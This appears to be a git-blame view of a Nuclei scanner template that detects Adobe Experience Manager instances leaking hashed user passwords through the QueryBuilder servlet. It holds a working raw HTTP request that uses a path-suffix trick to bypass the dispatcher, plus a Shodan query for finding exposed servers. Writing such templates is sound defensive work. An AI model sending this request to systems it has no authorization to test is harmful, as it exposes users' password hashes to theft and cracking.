2021-04-05 13:10:29 +00:00
|
|
|
id: aem-hash-querybuilder
|
|
|
|
|
|
|
|
info:
|
2021-04-05 17:06:51 +00:00
|
|
|
name: Query hashed password via QueryBuilder Servlet
|
2022-04-22 10:38:41 +00:00
|
|
|
author: DhiyaneshDk
|
2021-04-05 13:10:29 +00:00
|
|
|
severity: medium
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://twitter.com/AEMSecurity/status/1372392101829349376
|
2022-07-25 17:37:34 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 1
|
2022-07-25 17:37:34 +00:00
|
|
|
shodan-query: http.component:"Adobe Experience Manager"
|
2021-04-05 13:15:09 +00:00
|
|
|
tags: aem
|
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-04-05 13:10:29 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
|
|
Accept-Language: en-US,en;q=0.5
|
|
|
|
Accept-Encoding: gzip, deflate
|
2021-04-05 17:06:51 +00:00
|
|
|
|
2021-04-05 13:10:29 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2021-04-05 17:06:51 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- '"success":true'
|
2021-04-05 17:07:57 +00:00
|
|
|
- 'rep:password'
|
2021-06-18 10:23:49 +00:00
|
|
|
condition: and
|